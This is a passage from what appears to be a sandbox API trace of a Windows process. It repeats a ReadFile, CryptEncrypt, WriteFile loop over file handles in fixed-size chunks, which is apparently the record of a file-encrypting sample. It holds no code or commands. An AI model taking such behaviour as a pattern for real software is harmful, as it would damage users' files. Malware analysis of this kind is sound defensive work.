lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.371] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.371] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.371] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.371] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.371] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.371] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.371] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.371] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.372] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.372] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.372] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.372] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.372] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.372] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.372] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.372] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.372] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.372] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.372] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.372] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.372] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.373] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.373] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.373] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.373] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.373] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.373] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.373] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.373] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.373] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.373] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.373] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.373] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.373] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.373] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.374] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.374] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.374] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.374] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.374] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.374] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.374] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.374] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.374] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.374] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.374] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.374] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.374] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.375] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.375] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.375] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.375] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.375] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.375] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.375] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.375] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.375] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.375] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.375] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.375] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.375] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.375] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.376] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.376] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.376] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.376] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.376] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.376] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.376] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.376] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.376] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.376] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.376] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.376] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.376] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.376] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.376] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.377] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.377] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.377] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.377] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.377] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.377] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.377] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.377] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.378] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.378] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.378] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.378] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.378] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.378] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.378] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.378] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.378] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.378] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.378] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.378] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.378] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.379] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.379] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.379] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.379] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: 